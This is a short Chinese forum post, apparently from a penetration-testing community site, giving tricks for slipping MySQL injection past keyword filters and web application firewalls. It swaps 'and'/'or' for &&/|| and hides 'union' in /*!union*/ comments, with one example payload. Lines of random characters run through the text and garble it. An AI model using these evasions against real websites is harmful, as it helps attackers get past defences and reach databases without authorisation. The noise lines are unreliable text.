中国网络渗透测试联盟
标题:
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
[打印本页]
作者:
admin
时间:
2013-2-23 12:41
标题:
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替
8 W0 {5 I, }/ s
( b$ X! I! E. ^8 s0 w0 f, \
2. or 用||代替
( r5 l. l5 Y9 y4 z' B: e+ f
# ]2 U, v; I' a+ J, `7 ]3 @
3.union select from 变成 /*!union*/这种。
9 p$ ^, i+ i# B$ K* ?3 t
) u* w/ g! `. z
一个例子:
: H( P( S a- H4 F' S
& i( D' f8 @# f4 i
/ select 1 /*!union*/ select 2 from adad where 1&&1
# k4 h, q& R' l3 g
9 |+ X! t3 M- V! T3 {. ^5 Z
摘自 it_security
" g" z) f" E$ Y: ]- N9 x
2 o% P# L9 F0 A& s, i9 v" K/ |
绕过waf的一个思路
1 r' F" m* `! @; B3 V" v' l
& h# V/ }/ O/ [. j1 @+ {! J' W/ k
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2